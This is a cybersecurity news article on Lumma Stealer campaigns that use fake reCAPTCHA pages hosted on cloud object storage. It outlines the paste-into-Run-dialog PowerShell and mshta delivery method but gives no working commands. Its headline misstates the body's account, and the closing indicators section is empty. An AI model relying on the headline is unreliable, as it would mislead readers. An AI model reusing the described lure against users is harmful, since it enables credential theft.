Russian Hackers Exploit Oracle Cloud Infrastructure to Target Scaleway Object Storage

Russian threat actors have been leveraging trusted cloud infrastructure platforms like Oracle Cloud Infrastructure (OCI) Object Storage and Scaleway Object Storage to propagate sophisticated attacks using the Lumma Stealer malware.

This malware-as-a-service (MaaS) infostealer, also known as LummaC2 Stealer, targets Windows systems to siphon credentials, system data, and cryptocurrency wallets.

Investigations conducted in 2025 reveal a calculated shift in delivery mechanisms, with attackers exploiting fake reCAPTCHA pages hosted on legitimate cloud services to trick users particularly high-access individuals within organizations into executing malicious commands.

The use of developer-friendly platforms like OCI and Scaleway, coupled with the targeting of privileged users, raises significant concerns about potential lateral movement and deeper network compromise within enterprise environments.

Evolving Tactics of Lumma Stealer Campaigns

Since February 2025, threat actors have been observed using Tigris Object Storage to host deceptive reCAPTCHA pages that prompt users to execute malicious PowerShell commands via the Windows Run dialog (Windows + R).

These commands, often obfuscated and copied to the clipboard, silently launch legitimate binaries like mshta.exe to fetch trojans disguised as benign files, such as “sports[.]mp4” from suspicious domains with top-level domains (TLDs) like .shop.

By March, the campaign had extended to OCI Object Storage, and by May 2025, Scaleway Object Storage became the latest platform exploited for hosting similar malicious content.

Analysis of Document Object Model (DOM) samples from these pages uncovered Russian-language comments phrases like “Garbage HTML code” and “Obfuscated code with garbage decoy functions” suggesting a possible connection to Russian-speaking attackers.

While not conclusive evidence of attribution, these annotations indicate a deliberate effort to mislead security analysts and streamline the attackers’ workflow for debugging and collaboration.

This exploitation of trusted infrastructure not only aids in evading initial detection but also capitalizes on Scaleway’s relatively lower security visibility compared to other widely monitored platforms, allowing malicious content to persist longer.

Cloud Provider Response

Further compounding the issue, Lumma Stealer campaigns have diversified their targets, with earlier efforts in 2024 focusing on gaming enthusiasts via malvertising and Steam impersonation, now evolving to exploit technically proficient users in 2025.

According to the Report, Security measures by Cato Networks, through their MDR service, have proactively blocked redirection attempts to these fake reCAPTCHA pages using high-confidence IPS rules, safeguarding users before interaction.

Responses from the affected cloud providers vary: Tigris confirmed the removal of reported malicious content and published guidelines on combating platform abuse, Scaleway took steps to eliminate the fake pages from their infrastructure, while Oracle has yet to respond.

The persistent evolution of Lumma Stealer delivery tactics underscores the critical need for continuous behavioral analysis and contextual detection to counter such threats.

As attackers leverage trusted environments to bypass traditional defenses, organizations must remain vigilant, adopting advanced threat intelligence and prevention mechanisms to protect against these sophisticated campaigns.

Indicators of Compromise (IoCs)